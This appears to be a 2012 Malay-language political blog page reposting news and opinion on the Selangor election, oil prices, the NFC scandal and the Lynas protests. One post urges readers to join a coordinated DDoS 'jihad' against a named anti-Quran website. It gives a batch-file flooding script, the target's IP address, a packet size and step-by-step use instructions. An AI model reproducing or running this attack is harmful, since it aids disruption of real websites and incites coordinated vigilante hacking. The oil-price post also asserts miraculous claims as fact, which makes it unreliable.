Saturday, March 3, 2012

PRU 13:MB yakin pertahan Selangor dengan majoriti dua pertiga


Meskipun pilihan raya negeri tidak semestinya diadakan serentak dengan pilihan raya umum, Menteri Besar Selangor Tan Sri Abdul Khalid Ibrahim penuh keyakinan bahawa Pakatan Rakyat bukan sahaja mengekalkan kuasa tetapi juga menambakan jumlah kerusi mereka

NONE"Bancian yang kami terima menunjukkan bahawa Pakatan Rakyat mampu menang lebih banyak kerusi daripada apa yang kita ada sekarang, ini bermakna kita boleh dapat majoriti dua pertiga," katanya kepada pemberita dalam satu temu bual denganbeberapa media pilihan.

Menurut Abdul Khalid, (kanan) jika Perdana Menteri Datuk Seri Najib Razak begitu yakin BN akan menang pada pilihan raya umum, beliau selaku pengerusi BN sudah pasti akan membubarkan Dewan Rakyat pada November tahun lalu atau semasa Tahun Baru Cina seperti yang dijangkakan senelum ini.

"Sudah tentu di Selangor terdapat penyokong tegar Umno, sekumpulan kecil penyokong MCA dan beberapa penyokong MIC,

"Tetapi kaji selidik menunjukkan bahawa kami mendapat penarafan yang baik, terutama di kalangan mereka dalam kumpulan umur 40 tahun dan ke bawah," katanya.

Menurut Abdul Khalid, Pakatan Selangor "cukup yakin" mampu mengekalkan 30 kerusi, "mudah" untuk mendapatkan enam kerusi dan "kemungkinan besar" merampas 10 lagi.

NONEAntara satu kerusi yang Pakatan "kemungkinan besar" rampas itu, katanya adalah Kuala Kubu Baru, yang kini dipegang oleh setiausaha jawatankuasa MCA Selangor Wong Koon Mun.

Bagaimanapun, Abdul Khalid tidak mahu meneruskan perbincangan mengenai kerusi-kerusi yang mungkin dirampas oleh Pakatan itu dan secara berseloroh berkata "ia akan memberikan orang tertentu serangan jantung."

Pakatan kini menguasai 35 daripada 56 kerusi di Dewan Undangan Negeri (DUN) Selangor , selepas ADUN Pelabuhan Klang, Badrul Hisham Abdullah berpaling tadah daripada PKR dan menjadi ADUN Bebas mesra BN pada 2009.

Gabungan itu memerlukan sekurang-kurangnya 3 lagi kerusi, menjadikan jumlah mereka 38 bagi mendapatkan majoriti dua pertiga untuk memberi mereka kuasa untuk meminda perlembagaan negeri.

Selangor, menjadi fokus atau tumpuan pemerhati politik sejak pilihan raya umum 2008 apabila BN dikatakan banyak membelanjakan wang dan menggerakan pelbagai jenteranya bagi merampas semula negeri terkaya di negara itu.

NONEMengenai jumlah hadirin dan penyokong yang didakwa semakin hari semakin ramai pada majlis dan aktiviti anjuran BN, Abdul Khalid, berkata tidak perlu dirisaukan kerana kebanyakan yang hadir adalah muka yang sama setiap kali diangkut dengan bas dari tempat lain.

"Kami juga lakukan beberapa kaji selidik terhadap orang ramai yang menghadiri majlis PM dan fungsi TPM, dan mendapati hadirin itu kebanyakan mereka adalah orang yang sama," katanya sambil tergelak.

Friday, March 2, 2012

Pemuda Islam Perintis Pemikiran Beridealisme Tinggi

Menjana Pemikiran Pemuda

babySejak zaman-berzaman, kegemilangan sesebuah tamadun adalah bergantung kepada kekuatan pemuda yang hidup pada zaman mereka. Pemuda digambarkan sebagai satu golongan yang bersemangat untuk merealisasikan apa yang terbuku dalam hati mereka dan merekalah golongan yang beridealisme tinggi.
Adalah silap apabila wujud suara yang menghadang idealisme kerana kadang-kala idealisme harus dikembangkan untuk mewujudkan satu impian dan plan bertindak yang realistik dan sistemik.
Perjuangan Rasulullah SAW yang tampak idealis didokong oleh golongan pemuda di saat golongan tua menolak baginda SAW. Pemuda berada di celah-celah kegilaan dan apabila mereka inginkan sesuatu, mereka akan lakukan dengan semangat 'kegilaan' yang ada pada diri mereka. Saya suka istilahkan kegilaan itu sebagai semangat 'ekstasi'.

Ekstasi ialah satu saat kemuncak dalam hidup seseorang yang mana ketika itu ia akan berasa satu kekuatan yang entah dari mana muncul dalam diri mereka dan mendorong mereka untuk bertindak di luar kemampuan mereka. Ini digambarkan oleh Zaid bin Harithah yang hanya mengambil masa selama tujuh hari untuk mempelajari dan menguasai bahasa Yahudi. Imam Al-Syafie sendiri mempamerkan ekstasi beliau apabila mula menjadi guru kecil sewaktu berumur 10 tahun dan dilantik sebagai mufti muda ketika usianya mencecah 15 tahun.
Ekstasi melahirkan satu perubahan, atau kita menyebutnya sebagai reformasi. Perubahan merupakan satu perkara yang tidak tetap, dan setiap zaman memerlukan perubahan.
Hal ini digambarkan oleh seorang ulama yang memelihara anjing dan beliau telah dikritik oleh para pendokong mazhab anutan beliau. Beliau lantas menjawab: "Sekiranya guru kita berada dalam lingkungan kita pada masa sekarang, nescaya bukan sekadar anjing, bahkan singa pun boleh kita pelihara".
Setiap manusia, bahkan negara dan bangsa memerlukan kepada perubahan. Bangsa yang tidak berani berubah adalah bangsa yang lemah dan dayus dalam berijtihad. Negara yang tidak berubah adalah negara yang kekal mundur dan tidak akan maju selamanya.
Pemikiran lama akan ditenggelamkan oleh pemikiran baru.
Albert Einstein berkata:
"Masalah zaman kita tidak mampu untuk diselesaikan oleh pemikiran pada zaman kita". Perubahan menuntut kecekalan dan keberanian, bukannya jiwa-jiwa yang dayus dan lemah. Orang yang penakut akan kekal berada di tampuk yang lama kerana mereka sudah hidup dalam zon acuh tidak acuh, namun orang yang berani akan melakukan perubahan dari masa ke masa tanpa mengira cercaan dan gugatan terhadap mereka.
Hanya pemuda dan kepemudaan mampu mendokong perubahan. Tatkala para malaikat tidak sabar untuk menghumbankan bukit-bukau ke atas penguni Thaif yang mencerca Rasulullah SAW, baginda lantas menghalang niat para malaikat. Pandangan baginda ternyata jauh dan analitikal: "Boleh jadi lahir daripada sulbi mereka, zuriat yang akan mengimani risalahku ini".
Ya, generasi baru harus dibentuk mulai sekarang. Generasi yang tidak hanya melihat dengan pandangan singkat dan dekat, tetapi generasi berpandangan jauh dan meluas, seolah-seolah sayap matahari yang tidak hanya melimpah di satu tempat tetapi menerangi seluruh alam.
Kita boleh perhatikan riak-riak perubahan yang sedang berlaku di Turkey. Sepanjang mereka berpayungkan sistem sekularisme, ekonomi mereka tidak berkembang dan mereka hidup dalam suasana yang kucar-kacir. Nama mereka tidak disebut-sebut sebagai sebuah negara yang maju setelah kejatuhan Turki Uthmaniah. Tetapi setelah wujudnya generasi baru yang membawa pemikiran dan budaya hidup yang menongkah arus, maka kita dapati gelombang perubahan berlaku dengan pesat.
Malah, Turkey merupakan negara ke-6 termaju dalam Eropah dan negara ke-16 di dunia yang mempunyai kuasa ekonomi terbesar. Apa yang menarik juga Turkey merupakan negara dunia ke-13 yang paling menarik dan berdaya saing.
Umat Islam harus memiliki jiwa kepemudaan yang tinggi. Jiwa kepemudaan tidak hanya dimiliki oleh pemuda, malah semua orang berhak untuk memiliki jiwa dan semangat kepemudaan ini. Jiwa yang sentiasa meronta-ronta untuk membuahkan pembaharuan dari semasa ke semasa supaya ummah tidak ketinggalan dan hanya mengikut dari belakang.
Jiwa kepemudaan juga perlu supaya kita tidak hanya memasang angan-angan seperti Mat Jenin, atau hanya berperilaku seperti Luncai dengan labu-labunya. Cukuplah, kita sudah tidak tahan dan sanggup didendangkan dengan cerita-cerita yang melembapkan pemikiran kita seperti Pak Pandir, Lebai Malang, Awang Kecil, Sang Luncai sebagaimana negara Arab yang mempopularkan kisah Juha, Abu Nawas dan 1001 Malam, sedangkan Barat sudah meluaskan empayar penguasaan mereka hingga ke angkasa lepas.
Orang kita melihat udara lalu terciptalah layang-layang sedangkan Barat mencipta kapal terbang. Orang kita melihat sungai untuk berenang, sedangkan Barat mencipta kapal. Malah saya ingin menambah lagi, orang kita melihat bulan untuk menentukan waktu Ramadhan dan Syawal, sedangkan Barat melihat bulan lalu dijelajahnya. Tepuk dada, tanyalah DIRI.
- Artikel iluvislam.com

Harga Minyak Dunia Naik..Adakah Harga Minyak Malaysia Naik Slps PRU-13

Inikah sebabnya najib mahu bubar parlimen secepat mungkin???

harga minyak dunia Harga Minyak Dunia Terus Melambung Tinggi US$108.62 Setong!!
Pada hari Isnin lepas, Singapura mula tidak senang duduk melihatkan harga minyak dunia sudah mula melonjak naik ke paras tertinggi sejak 9 bulan lepas. Begitu juga negara-negara lain yang tiada minyaknya akan “mula kepanasan”. Pada masa itu, harga minyak dunia yang berjaya dicatatkan adalah sekitar US$105 setong.
Agak-agak Malaysia akan terjejas atau tidak? Kalau jawapannya terjejas agak pelik bunyi. Kita ada hasil minyak sendiri. Minyak yang kita gunakan seharian sekarang ini daripada gred rendah yang dibeli daripada negara pengeluar minyak yang lain manakala daripada hasil minyak Malaysia sendiri yang dijual di luar merupakan minyak yang berkualiti tinggi (“sweet crude” yang mana kandungan sulfur di dalamnya amatlah rendah).
harga minyak Harga Minyak Dunia Terus Melambung Tinggi US$108.62 Setong!!

Jikalau hari ini harga minyak dunia terus naik :
  • Pendapatan Malaysia juga akan turut meningkat sekali ganda dengan kualiti minyak yang dimiliki oleh Malaysia + kenaikan harga minyak dunia

Harga Minyak Dunia Naik Sekarang Ini, Apa Sebabnya?

harga minyak dunia 2012 Harga Minyak Dunia Terus Melambung Tinggi US$108.62 Setong!!
Iran yang merupakan pengeksport minyak kelima terbesar di dunia. Iran juga menyumbang 18% penghantaran minyak bagi negara-negara di Eropah. Kementerian Minyak Iran menghentikan penghantaran minyak mentah kepada syarikat-syarikat Britain dan Perancis yang memberikan kesan buruk kepada kesatuan Eropah. Tak cukup lagi setakat ini, dikhabarkan yang Venezuela pun akan hentikan bekalan ke Eropah sebagai tanda sokongan kepada Iran..
  • Spekulasi perang Iran.
  • Amerika berang apabila jual beli minyak Iran dengan India tidak lagi menggunakan matawang USD. Serta-merta nilai dollar jatuh dan meningkatkan nilai emas
  • Sekarang ini urusniaga India-Iran adalah melalui emas. Amerika mahu duduk diam?
  • Amerika semestinya mahu mengukuhkan matawang USD mereka tetapi jika Iran terus berdegil, peranglah jawapannya

Umat Islam Seluruh Dunia Perlu Bersatu – Kelebihan Minyak Untuk Umat Islam

  • Sepatutnya seluruh umat Islam mengambil langkah ini, kembali kepada dinar dan dirham sebagai alternatif pertukaran wang dagangan kerana terbukti ia pasti menggugat musuh Islam terbesar kini iaitu Amerika Syarikat
  • Kita mesti yakin kepada pertolongan Allah, seperti juga air zamzam yang tidak pernah kering walaupun berjuta-juta umat Islam mengambilnya saban hari saban tahun, begitu juga Allah menganugerahkan minyak kepada seluruh negara Islam hatta Bosnia sebaik saja istihar sebagai negara Islam maka meleleh keluarlah minyak dari buminya!
  • Begitu juga emas jika umat Islam yakin dan bertakwa insyaAllah ia akan melimpah ruah menjadi kepunyaan umat Islam
Yang pastinya golongan yang tersenyum lebar dengan berita kenaikan harga minyak dunia, adalah penyimpan emas. Harga minyak dunia naik VS harga emas akan turut sama naik.
Jikalau harga minyak dunia terus meningkat naik melebihi kenaikan dahulu, tidak mustahil harga minyak RON95 akan juga dinaikkan. Cuma mungkin berita ini tidak akan didendangkan terlebih dahulu memandangkan Pilihanraya Umum ke 13 akan diadakan tidak lama sahaja lagi. -BS

Monday, February 27, 2012

Dah 4tahun..Najib br mengaku ada silap di Selangor dan baru insaf.nape tak selepas PRU-12?.

Najib akui BN ada buat kesilapan di Selangor
Perdana Menteri Datuk Seri Najib Razak hari ini mengakui kerajaan BN ada membuat sedikit kesilapan pada masa dulu hingga menyebabkan rakyat tidak lagi menyokong mereka.

NONENamun katanya, BN kini sudah insaf daripada kesilapan sebelum ini dan juga memohon maaf kepada rakyat di Selangor.

"Kita akui mungkin kita ada buat sedikit sebanyak kesilapan pada masa dulu sebab itu rakyat tidak menyokong kita. Tapi kita sudah insaf daripada kesilapan dulu dan kita mohon maaf kepada rakyat Selangor kalau ada apa-apa kesilapan.

"Dan kita berikrar daripada kesilapan itu, atas kesedaran itu, kita akan bangunkan satu kekuatan baru untuk mengubah landskap di Selangor supaya di bawah kepimpinan BN, kita akan menjurus kepada masa depan yang lebih baik lagi," katanya dipetik Bernama pada majlis pelancaran jentera pilihan raya BN Selangor di Pelabuhan Kelang, hari ini.

Sehubungan itu, Najib juga dipetik Bernama sebagai berkata Pakatan Rakyat tidak perlu diberi "tempoh lanjutan" untuk terus memerintah Selangor yang menyaksikan banyak janjinya tidak tertunai malah membebankan rakyat dengan pelbagai masalah.

Dakwanya, Selangor selama ini maju kerana dasar-dasar dan prasarana yang dilaksanakan kerajaan BN sebelum ini, dan pihak pembangkang tidak boleh mendapatkan pujian terhadap hasil titik peluh BN itu.

"Sudah cukup empat tahun Selangor di bawah pakatan pembangkang, jangan kita bagi tempoh lanjutan sebab kalau bagi tempoh lanjutan nanti susah nak dapat balik. Inilah peluang terbaik untuk mengembalikan bumi Selangor kepada BN," katanya.

Bernama
bagaimanapun tidak melaporkan sama ada Najib ada menyatakan kesilapan-kesilapan BN itu dan di bawah Menteri Besar manakah perkara itu berlaku.

Pada ucapan selama setengah jam itu, Najib yang juga Pengerusi BN Selangor berkata sejak dua minggu lepas, beliau telah turun padang ke Perak, Melaka, Kedah dan hari ini di Selangor, dan mendapati suasana dalam negara kini menjurus menyokong BN pada pilihan raya umum kelak.

Sambil memanggil hadirin yang hadir sebagai 'bala tentera BN Selangor', Najib berkata BN boleh merampas kembali Selangor jika bilangan bala tentera itu lebih ramai, lebih berani, pintar dan nekad serta sanggup bekerja lebih keras daripada pihak lain.

"Semangat dah ada, matlamat sudah dapat dilihat, perancangan sudah ada... semuanya sudah lengkap... ayuh kita turun berjuang habis-habisan," kata Najib.

Menurut beliau, anggota BN perlu akur dengan pucuk pimpinan dalam soal pemilihan calon dan memberi sokongan penuh kepada mereka yang dipilih untuk bertanding pada pilihan raya nanti.

"Jangan sabotaj parti kita sendiri sebab jika kita sabotaj parti, ibarat kita menjaringkan gol sendiri dan bila jaring gol sendiri kita akan kalah dan seterusnya kita akan merana," tegas Perdana Menteri,” katanya.

Najib juga mengingatkan calon-calon BN supaya menjaga kepentingan semua kaum dan bukan hanya kaum tertentu kerana ini menjadi asas dalam memastikan kemenangan BN.

Katanya semangat BN menjadi pudar kerana terkena tsunami politik pada pilihan raya umum lalu.

"Tetapi dalam tempoh empat tahun kita telah bina semula jentera BN di Selangor sedikit demi sedikit, semangat kita yang pudar itu, moral kita yang luntur itu hari ini telah bertukar wajah," katanya.

Jihad Kecil.Pahala Berlipat Ganda..takbir

WEBSITE BAKAR AL-QURAN - JOM SERANG SAMPAI LINGKUP!!!!

Demo membantah dan mengutuk tindakan tentera syaitan Amerika membakar Al-Quran baru2 ni tidak mencukupi jika anda tak bersama kami menjahanamkan satu portal yang cukup menghina dan mengguris umat islam iaitu http://www.burn-the-koran.com/dengan cara serangan DDOS atau Distributed Denial of Service.

Pihak kami sedang bertungkus lumus untuk menghancurkan website ini dan sementara itu kami memerlukan bantuan anda untuk menyertai kami dalam jihad kecil ini. Untuk mereka yg tidak tahu disini saya turunkan cara paling mudah untuk serangan ini. iaitu membuat aplikasi DDOS (Distributed Denial of Service) dengan bantuan Batch File. Semoga usaha kita ini diberkati Allah S.W.T ...... TAKBIR !!

Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !


Sila ikut Step By Step :


.::[Cara Pembuatan]::.




1) Buka notepad




2) Copy Code yg di bold dibawah ini

@echo off



mode 67,16



title DDOS Attack by d43n91n3



color 0a

cls

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo DDOS With Batchfile


echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo.

set /p x=Server-Target:

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



ping %x%



echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


@ping.exe 127.0.0.1 -n 5 -w 1000 > nul


goto Next

:Next

echo.

echo.


echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 0c

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS


3) Paste code tersebut kedalam notepad anda


4) Save as file tersebut pilih all file.

5) tukarkan nama file dan extension file tersebut kepada "DDOS.bat"


6) Siap cara pembuatan


Atau download saja di sini click

.::Cara Guna::.


1) Buka File "DDOS.bat" itu tadi.

2) Pada menu Server Target tersebut, Masukkan Url website iaitu :

burn-the-koran.com



3) Tekan "Enter"



4) Selepas anda tekan enter, applikasi ini akan memaparkan :

ip Host


5) Langkah seterusnya, Bila applikasi ini minta anda masukkan "ip host" anda perlulah memasukkan Nombor IP yang telah tercatit semasa ujian Ping diatas dilakukan iaitu


64.182.89.11


6) Tekan "Enter"


7) Seterusnya anda di minta untuk memasukkan di bahagian "Packet Size". Masukkan jumah "100000"


8) Kemudian tekan butang "Enter"


9) DONE ! Tahniah !Serangan DDOS telah berjaya anda jalankan !


10) Serangan DDOS ini akan berlaku selagi anda belum tutup Applikasi ini.


11) Biarkan Applikasi ini berjalan dan anda boleh buat perkara lain...tido ke no hal.


12)Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !

11) Semoga berjaya ! TAKBIR !! ALLAHUAKBAR!!


Sebuah kisah di zaman Nabi Ibrahim, semasa Nabi Ibrahim dibakar oleh kaumnya, seekor burung kecil terbang berulang alik mengisi air dalam paruhnya lalu menyiram ke atas api yang membakar. Itulah yang dilakukannya berulangkali. Tingkah lakunya diperhatikan oleh makhluk Allah yang lain lalu bertanya kepada burung kecil itu, ‘buat apa kau penat-penat mengambil air berulang alik, sedangkan api yang membakar Nabi Ibrahim takkan terpadam dengan air yang kau siramkan itu.’Lalu dijawab oleh burung tersebut, ‘Memang ia tidak akan memadamkan api tersebut, tetapi aku lebih takut kepada Allah kerana Allah akan menyoal aku nanti, apakah yang aku lakukan untuk agama Allah, dan Allah tidak akan bertanya samada aku berjaya memadamkan api itu ataupun tidak‘.

Dan janganlah kita menjadi seperti cicak (yang terbang), yang bertindak jahat dengan menghembus-hembus kepada api yang membakar Nabi Ibrahim dengan harapan api akan menjadi marak lagi untuk terus membakar Nabi Ibrahim (walaupun sebenarnya hembusannya itu tidak membawa kesan ke atas api berkenaan.)

Anbiyaa [69] Kami berfirman: Hai api, jadilah engkau sejuk serta selamat sejahtera kepada Ibrahim!.

Hadith riwayat Ibn Hatim, dari A’isyah ra. bahawa Rasulullah saw bersabda :”Sesungguhnya Ibrahim tatkala dicampakkan kedalam api, semua binatang yang melata dimuka bumi ini cuba memadamkan api, kecuali cicak, kerana sesungguhnya dia (cicak) meniupkan api keatas Nabi Ibrahim…”

## ADAKAH ANDA BERSIFAT CICAK ATAU BURUNG? ##


Read more: http://biaqpila.blogspot.com/2012/02/website-bakar-al-quran-jom-serang.html#ixzz1nVTAhWod

Sunday, February 26, 2012

Himpunan 2.0:Kerajaan dengar ke Suara Rakyat ni.Dorang wat bodo je ni.

K'jaan diberi 24 jam tutup Lynas atau hadapi Hijau 3.0
Kerajaan hari ini diberi tempoh 24 jam bagi menutup loji pemprosesan nadir bumi Lynas Advanced Material Plant (Lamp) di Gebeng atau menghadapi Himpunan Hijau 3.0.

NONEDengan kehadiran ribuan peserta Himpunan Hijau 2.0 di Kuantan pagi ini, pengerusi jawatakuasa pemandu Wong Tack menjanjikan jumlah yang lebih ramai jika kerajaan sekarang terus berdegil tidak memperdulikan bantahan dan rayuan rakyat itu.

"Kami memberi tempoh kepada kerajaan 24 jam untuk menutup loji berkenaan, jika tidak kami akan menganjurkan demonstrasi yang lebih besar.

"Tutup kilang Lynas, atau kami akan tumbangkan kerajaan, kamu buat keputusan," katanya sambil menggesa kerajaan menyelesaikan masalah berkenaan sebelum pilihan raya umum akan datang.

Bercakap dalam sidang media selepas perhimpunan itu, Wong berkata jika perhimpunan kali ketiga berlangsung, seluruh rakyat Malaysia akan turun menyertainya bagi membantah kehadiran loji tersebut.

Ditanya mengapa pihaknya tidak mengambil jalan lain antaranya berdialog dengan kerajaan untuk menyelesaikan masalah ini, Wong menegaskan tindakan itu "tidak relevan".

"Kita sudah tunggu satu tahun untuk dialog. Jangan buang masa lagi. Cukuplah," katanya.

Beliau juga mempersoalkan mengapa kerajaan menerima projek itu beroperasi di negara ini, bahkan sisa bahan radioaktif tersebut akan ditanam di sini.

"Mungkin boleh menjadi kerajaan untuk beberapa tahun, tetapi (sisa) itu kekal dalam tempoh yang lama.

"Kerajaan boleh buat janji kosong, yang menanggung derita adalah rakyat," katanya.

Himpunan 2.0:MPK4 banjir dengan 15 ribu orang.pe tindakan kerajaan negeri.Tengok je kot?

15 ribu hadir, laman web Lynas digodam


NONEPerhimpunan itu sebagai membantah tindakan Lynas Advanced Material Plant (Lamp) di Gebeng yang mahu membina sebuah loji pemprosesan nadir bumi yang berharga RM700 juta. Syarikat berkenaan awal bulan ini mendapat lesen operasi sementara dan kelulusan daripada Lembaga Pelesenan Tenaga Atom (AELB) untuk memulakan operasi mereka.

Penganjur perhimpunan itu malam tadi, membuat pengumuman mengejutkan pada tengah malam tadi di Facebook dengan mengumumkan bahawa mereka akan berkumpul di padang MPK1 di sepanjang Jalan Mahkota pada jam 9.30 pagi.

Menurut mereka, tindakan berkumpul di padang itu yang terletak kira-kira 1.8km dari padang MPK4 bertujuan "mengelakkan kesesakan lalu lintas".

himpunan hijau 2 260212 stage front viewDari padang MPK1 mereka akan berarak ke padang MPK4. Padang MPK1 sebelum ini menjadi pilihan penganjur, namun secara tiba-tiba pada Khamis lalu, pihak berkuasa tempatan -
Majlis Perbandaran Kuantan (MPK) - mula mendirikan pagar dengan alasan untuk "kerja-kerja menaik taraf".

Namun setelah berunding dengan polis pada Jumaat lalu, akhirnya pihak berkuasa bersetuju membenarkan perhimpunan diteruskan dan padang MPK4 diberikan kepada orang ramai yang mahu membuat bantahan itu.


Lintas Langsung Ikuti MalaysiaKini : http://www.malaysiakini.com/news/190306

NFC:Pengerusi terkejut beruk polis tuduh pecah amanah.

NFC terkejut cadangan tuduhan pecah amanah
Syarikat projek ternakan lembu Perbadanan Fidlot Kebangsaan (NFC) hari ini melahirkan rasa terkejut dengan cadangan polis supaya pengerusinya, Datuk Mohamed Salleh Ismail didakwa atas tuduhan pecah amanah (CBT), menegaskan kenyataan itu diberikan terlalu awal sedangkan siasatan masih dijalankan.

ramli yusuff asset declare case 120310 muhammad shafee abdullah"NFC terkejut dan bingung bahawa pengarah Jabatan Siasatan Jenayah Komersial Bukit Aman, Syed Ismail Syed Azizan mengeluarkan kenyataan itu terlalu awal sedangkan beliau sendiri mengakui siasatan masih berjalan dan dengan itu masih belum siap," menurut syarikat itu dalam kenyataan yang disediakan oleh firma perunding perhubungan awamnya.

Menurut kenyataan itu, syarikat sedang meneliti dakwaan polis itu atas nasihat peguamnya Shafee Abdullah (kanan).

Dalam kenyataan itu, NFC mempersoalkan sikap tidak berhati-hati dan motif di sebalik kenyataan itu, menyatakan ia dilihat seolah-olah satu cubaan secara tidak adil untuk mendahului keputusan yang bakal dibuat Peguam Negara berhubung perkara itu.

Semalam, Syed Ismail berkata, polis mencadangkan supaya Mohamed Salleh, suami Menteri Pembangunan Wanita, Keluarga dan Masyarakat, Datuk Seri Shahrizat Abdul Jalil didakwa bagi pertuduhan pecah amanah.

Beliau berkata, cadangan itu terkandung dalam kertas siasatan yang sedang disiapkan polis, setelah dikembalikan pihak Peguam Negara Selasa lalu bagi menyiasat beberapa perkara lain.

"Kertas siasatan ini akan dikembalikan ke pejabat AG (Peguam Negara) dalam masa terdekat," katanya ketika dihubungi.

azlanIsu NFC, yang diterajui Mohamed Salleh sebagai pengerusi eksekutif mula mendapat perhatian ramai selepas Laporan Ketua Audit Negara 2010 pada Oktober tahun lalu menyatakan NFC gagal memenuhi matlamat penubuhannya.

Isu itu menjadi panas apabila pembangkang mendakwa wujud penyelewengan terhadap peruntukan kerajaan berjumlah RM250 juta yang disalurkan kepada NFC.

NFC ialah projek "Lembah Daging" di Gemas, Negeri Sembilan yang bertujuan meningkatkan pengeluaran daging tempatan dan mengurangkan pergantungan negara terhadap daging import.

- Bernam

NFC:Polis Suruh Peguam Negara Dakwa Pengerusi NFC

Polis syor pengerusi NFC didakwa pecah amanah
Polis mencadangkan agar Peguam Negara mendakwa Pengerusi Eksekutif Pusat Fidlot Nasional (NFC) Datuk Mohamed Salleh Ismail (bawah, kiri) atas pertuduhan pecah amanah.

NONEPengarah Jabatan Siasatan Jenayah Komersial Bukit Aman Datuk Syed Ismail Syed Azizan berkata cadangan itu terkandung dalam kertas siasatan yang sedang disiapkan polis, setelah dikembalikan pihak Peguam Negara Selasa lepas bagi menyiasat beberapa perkara lain.

"Kita ada menyelitkan cadangan ini agar pihak Peguam Negara mengambil tindakan itu. Kertas siasatan ini akan dikembalikan dalam masa terdekat," katanya ketika dihubungi Bernama malam ini.

Isu NFC, yang diterajui Mohamad Salleh, suami Menteri Pembangunan Wanita, Keluarga dan Masyarakat, mula mendapat perhatian ramai selepas Laporan Ketua Audit Negara 2010 pada Oktober lalu menyatakan pusat itu gagal memenuhi matlamat penubuhannya.

azlanIa semakin panas selepas pembangkang mendakwa wujud penyelewengan terhadap peruntukan kerajaan berjumlah RM250 juta yang disalurkan kepada NFC.

NFC ialah projek 'Lembah Daging' di Gemas, Negeri Sembilan yang bertujuan meningkatkan pengeluaran daging tempatan serta mengurangkan pergantungan negara terhadap daging import.

- Bernam

LinkWithin

Related Posts Plugin for WordPress, Blogger...